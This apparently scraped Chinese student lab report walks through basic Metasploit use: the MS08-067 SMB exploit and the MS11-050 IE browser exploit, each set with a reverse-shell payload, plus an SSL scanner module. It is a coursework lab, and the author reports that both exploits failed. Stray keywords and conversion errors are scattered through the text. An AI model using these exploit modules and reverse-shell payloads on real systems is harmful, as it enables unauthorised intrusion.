20145338 《網絡對抗》 MSF基礎應用

20145338《網絡對抗》 MSF基礎應用html

實驗內容

·掌握metasploit的基本應用方式,掌握經常使用的三種攻擊方式的思路。
具體須要完成(1)一個主動攻擊;(2)一個針對瀏覽器的攻擊;(3)一個針對客戶端的攻擊;(4)成功應用任何一個輔助模塊。shell

基礎問題回答

·exploit:經過漏洞對程序攻擊的途徑,是一種手段或通道。
·payload:具體的攻擊代碼
·encode:假裝、隱藏 達到免殺目的。windows

實踐過程

##MS08_067安全漏洞滲透攻擊實踐api

實驗前先查看kali與靶機是否能夠ping通瀏覽器

靶機爲我此次新拷的WinXPenSP3
(將Kali與靶機網絡調製NAT模式,不然ping不通啊)
安全


1 ·輸入msfconsole進入msf

2 ·進入該漏洞模塊的使用(use exploit/windows/smb/ms08_067_netapi)
3 ·輸入命令show payload會顯示出有效的攻擊載荷,

4 ·show targets會顯示出能夠被攻擊的靶機的操做系統型號

5 ·設置攻擊有效載荷(set payload generic/shell_reverse_tcp)

6 ·輸入show options顯示咱們須要在攻擊前須要設置的數據,將靶機IP(RHOST)與kali IP(LHOST)進行設置

7 ·輸入exploit開始攻擊

攻擊失敗。。。。未完待續。。網絡

呀 ping都沒ping通 不失敗纔怪哦 。。。
繼續。。。
tcp

IE瀏覽器滲透攻擊——MS11050安全漏洞

·在kali終端開啓msfconsole,利用search命令搜索。

輸入命令use exploit/windows/browser/ms11_050_mshtml_cobjetelement,進入該漏洞模塊。使用info命令查看模塊信息 。

設置對應的載荷set payload windows/meterpreter/reverese_tcp;show options查看須要設置的相關信息:

查看配置滲透攻擊所需的配置選項

配置相關信息:set LHOST; ‘kali Ip’;; set LPORT 5338; set URIPATH ,


啓動exploit 生成攻擊


攻擊失敗.操作系統

Adobe閱讀器滲透攻擊

輔助模塊

我選擇auxiliary/scanner/ssl/openssl_ccs.rb
·在auxiliary中選擇scanner中的ssl其中一個模塊ccs.rb

·經過info查看須要配置的東西


·開始掃描
code

實驗體會

比起作不出實驗更讓人難受的是電腦卡的要死 有時候lali還罷工 直接就打不開了,情況百出。你們看到的是何時交的博客 並不知道在底下配置電腦花了多久。。 不過也還好 已經完成一個。

相關文章
相關標籤/搜索